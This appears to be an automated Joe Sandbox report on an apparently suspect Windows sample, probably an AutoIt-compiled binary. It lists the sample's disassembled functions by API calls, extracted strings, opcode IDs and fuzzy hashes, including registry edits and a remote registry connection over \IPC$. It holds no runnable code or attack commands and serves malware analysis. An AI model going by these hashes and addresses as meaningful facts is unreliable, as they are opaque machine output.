• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
• Instruction ID: 2d6e3b6f5a3c5c42a1fc12d99973f5fba1c2b25e96e381818fc4bf4e6d23e272
• Opcode Fuzzy Hash: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
• Instruction Fuzzy Hash: 28312A316046069FEB22AA3AE849BDA7FF9FF40318F55441AF449D7291DA35AC80CB30
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0057369C
• _wcslen.LIBCMT ref: 005736A7
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00573797
• GetClassNameW.USER32(?,?,00000400), ref: 0057380C
• GetDlgCtrlID.USER32(?), ref: 0057385D
• GetWindowRect.USER32(?,?), ref: 00573882
• GetParent.USER32(?), ref: 005738A0
• ScreenToClient.USER32(00000000), ref: 005738A7
• GetClassNameW.USER32(?,?,00000100), ref: 00573921
• GetWindowTextW.USER32(?,?,00000400), ref: 0057395D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
• String ID: %s%u
• API String ID: 4010501982-679674701
• Opcode ID: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
• Instruction ID: 317b7c397bd0880e0e8153a9bc3f02a8e07af5eaf326be7df6a93a3a6328cd43
• Opcode Fuzzy Hash: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
• Instruction Fuzzy Hash: D991B371204617AFD718DF24D885BAABFA8FF44360F008529FA9DD2190DB30EA45EB91
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00574994
• GetWindowTextW.USER32(?,?,00000400), ref: 005749DA
• _wcslen.LIBCMT ref: 005749EB
• CharUpperBuffW.USER32(?,00000000), ref: 005749F7
• _wcsstr.LIBVCRUNTIME ref: 00574A2C
• GetClassNameW.USER32(00000018,?,00000400), ref: 00574A64
• GetWindowTextW.USER32(?,?,00000400), ref: 00574A9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 00574AE6
• GetClassNameW.USER32(?,?,00000400), ref: 00574B20
• GetWindowRect.USER32(?,?), ref: 00574B8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
• Instruction ID: 6862e355f64ae1b0f7a1f9936421b4d5cbe64e2ad6600e7fc6a1b810eebfb31d
• Opcode Fuzzy Hash: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
• Instruction Fuzzy Hash: D891AA310042069FDB05DF14E985BAABFE9FF84314F04846AFD899A096EB30ED45DFA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A8D5A
                                                                                                                        • GetFocus.USER32 ref: 005A8D6A
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 005A8D75
                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 005A8E1D
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 005A8ECF
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 005A8EEC
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 005A8EFC
                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 005A8F2E
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005A8F70
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005A8FA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1026556194-4108050209
                                                                                                                        • Opcode ID: 854cfa4af9d39aaa85d806abfbdb3e1af39c3db621e4703754a01766f84f4079
                                                                                                                        • Instruction ID: fbe2605fa42ec8feb1f36669579a9faec27f22c9a864aecfae981815a84f2d8a
                                                                                                                        • Opcode Fuzzy Hash: 854cfa4af9d39aaa85d806abfbdb3e1af39c3db621e4703754a01766f84f4079
                                                                                                                        • Instruction Fuzzy Hash: 25818C71508302AFDB20CF24D888ABFBFE9FB9A354F140919F98597291DB70D905DBA1
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CC64
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0059CC8D
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD48
                                                                                                                          • Part of subcall function 0059CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0059CCAA
                                                                                                                          • Part of subcall function 0059CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0059CCBD
                                                                                                                          • Part of subcall function 0059CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059CCCF
                                                                                                                          • Part of subcall function 0059CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD05
                                                                                                                          • Part of subcall function 0059CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CD28
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059CCF3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                        • Opcode ID: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
                                                                                                                        • Instruction ID: 76449b2b1065bb2c4135b0473957e9dec6189acc7770e4949f094441577c5f4f
                                                                                                                        • Opcode Fuzzy Hash: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
                                                                                                                        • Instruction Fuzzy Hash: 94316E71A41229BBDB208B54DC88EFFBFBCFF56750F000165E905E6240DB349E49EAA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0057EA5D
                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0057EA73
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057EA84
                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0057EA96
                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0057EAA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                        • Opcode ID: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
                                                                                                                        • Instruction ID: b23c9614e526a7b91241434ed60e74c863b90059a5dfcc7ebf550558c172c401
                                                                                                                        • Opcode Fuzzy Hash: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
                                                                                                                        • Instruction Fuzzy Hash: C2115131A5021A79E720A7A5DC5FDFF6F7CFBD5B40F00082BB811A21D1EA701946D9B1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5
                                                                                                                        • DestroyWindow.USER32(?), ref: 00528C81
                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528D1B
                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00566973
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669A1
                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669B8
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000), ref: 005669D4
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005669E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 641708696-0
                                                                                                                        • Opcode ID: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
                                                                                                                        • Instruction ID: 30d0a4b81ba2f000b36e6c4fb785cd3ddd457784389474be67a17238baca1d2b
                                                                                                                        • Opcode Fuzzy Hash: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
                                                                                                                        • Instruction Fuzzy Hash: 45618031502B61DFDB259F54EA487397FF1FF62312F144918E082AB5A0CB35AC98EB54
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00529862
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 259745315-0
                                                                                                                        • Opcode ID: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
                                                                                                                        • Instruction ID: 4cb9e7f3d078a931fe476a7b2be02545f5e048aca7da1330e3f638e743243659
                                                                                                                        • Opcode Fuzzy Hash: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
                                                                                                                        • Instruction Fuzzy Hash: DD41AF31504654AFDB245F38AC88BB93FA5BF27330F184655F9A28B2E2D7319846EB10
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 005A5186
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 005A51C7
                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 005A51CD
                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 005A51D1
                                                                                                                          • Part of subcall function 005A6FBA: DeleteObject.GDI32(00000000), ref: 005A6FE6
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A520D
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A521A
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005A524D
                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 005A5287
                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 005A5296
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3210457359-2594219639
                                                                                                                        • Opcode ID: af91222d32c97ee58d4a0023129f4cb45ae7f0fa1f0a1f341734ad401d6bbe70
                                                                                                                        • Instruction ID: fe7235efff2c23d5327d5b586f3a8d11d5ceac297eb2c576746703b80b7ff7a7
                                                                                                                        • Opcode Fuzzy Hash: af91222d32c97ee58d4a0023129f4cb45ae7f0fa1f0a1f341734ad401d6bbe70
                                                                                                                        • Instruction Fuzzy Hash: 9B517A34A40A09AEEF249F24DC4AFEC3FA5FF57321F144011F6559A2E1E775A984EB40
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00566890
                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005668A9
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005668B9
                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005668D1
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005668F2
                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 00566901
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0056691E
                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 0056692D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1268354404-2594219639
                                                                                                                        • Opcode ID: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
                                                                                                                        • Instruction ID: 5e0b6f25aa68993db56f952f6c905eec3b766dfcd013a009b4c7cdb023e2328e
                                                                                                                        • Opcode Fuzzy Hash: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
                                                                                                                        • Instruction Fuzzy Hash: B2519570A00609AFDB20CF64DC95BAA3FB5FF9A710F104518F9529B2E0DB70E990EB40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                          • Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
                                                                                                                          • Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
                                                                                                                          • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
                                                                                                                          • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D
                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 005A8B6B
                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 005A8B71
                                                                                                                        • ReleaseCapture.USER32 ref: 005A8B77
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 005A8C12
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005A8C25
                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 005A8CFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u$p#^
                                                                                                                        • API String ID: 1924731296-3089080794
                                                                                                                        • Opcode ID: f8d4c5faa5ff4695383ca50636a240420c86e0cee78c32b368324acefec1c0df
                                                                                                                        • Instruction ID: d65b7d930107cc718ae49dd7914e4df3004e74037b0c6302dae5329496e7391d
                                                                                                                        • Opcode Fuzzy Hash: f8d4c5faa5ff4695383ca50636a240420c86e0cee78c32b368324acefec1c0df
                                                                                                                        • Instruction Fuzzy Hash: 9A518D70104345AFE714DF14DCA9BAE7BE4FB89714F000529F9929B2E2DB709D48CB62
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00579717
                                                                                                                        • LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579720
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00579742
                                                                                                                        • LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579745
                                                                                                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00579866
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                        • Opcode ID: 244c88c6ab636e7cabeb280391ca582e61dfb7b2ab91eca2f20b73cf9fccaa17
                                                                                                                        • Instruction ID: 80cc43e4dae3be0c9425749b8b5899d28683a7dc2cdb02409d0af7afc2769872
                                                                                                                        • Opcode Fuzzy Hash: 244c88c6ab636e7cabeb280391ca582e61dfb7b2ab91eca2f20b73cf9fccaa17
                                                                                                                        • Instruction Fuzzy Hash: 7541207280021AAADF14EBE0DD9ADEE7B78BF95340F104425F60572092EB356F89DB71
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005707A2
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005707BE
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005707DA
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00570804
                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0057082C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00570837
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0057083C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                        • Opcode ID: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
                                                                                                                        • Instruction ID: 24b33ed58f2f657a203f1727a9fedcb3e013658d3200f73d438afd1070e70d02
                                                                                                                        • Opcode Fuzzy Hash: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
                                                                                                                        • Instruction Fuzzy Hash: F9411A71C10229EBDF15EFA4DC998EDBBB8FF54350F144526E905A31A1EB30AE44DB90
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00587AF3
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00587B8F
                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00587BA3
                                                                                                                        • CoCreateInstance.OLE32(005AFD08,00000000,00000001,005D6E6C,?), ref: 00587BEF
                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00587C74
                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00587CCC
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00587D57
                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00587D7A
